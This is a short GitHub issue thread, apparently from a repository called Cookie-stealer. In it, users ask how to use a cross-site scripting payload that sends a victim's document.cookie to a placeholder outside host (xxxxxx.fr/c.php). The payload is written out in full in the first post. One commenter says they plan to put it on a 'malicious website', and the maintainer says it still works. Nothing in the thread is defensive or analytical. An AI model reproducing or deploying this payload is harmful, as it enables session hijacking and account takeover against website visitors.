### ISSUE TITLE
How do i use the provided script?

### ISSUE THREAD

**Issue by deman2660** [Xyl2k/Cookie-stealer#4]
how do i use "<script>location.href='http://xxxxxx.fr/c.php?c='+escape(document.cookie)</script> "? 
ik this might be a dumb question.

**Comment by Xyl2k** [comment]
it's literally on the readme.md

**Comment by slcls** [comment]
Mr. @Xyl2k is it still working up until now?

**Comment by slcls** [comment]
> Mr. @Xyl2k is it still working up until now?

I was planning to create a malicious website for demonstration purposes cointaning this wonderful creation of yours. Will it work properly up until now and can it perform well if the website i would be using got a SSL certificate?

**Comment by Xyl2k** [comment]
why wouldn't it work?
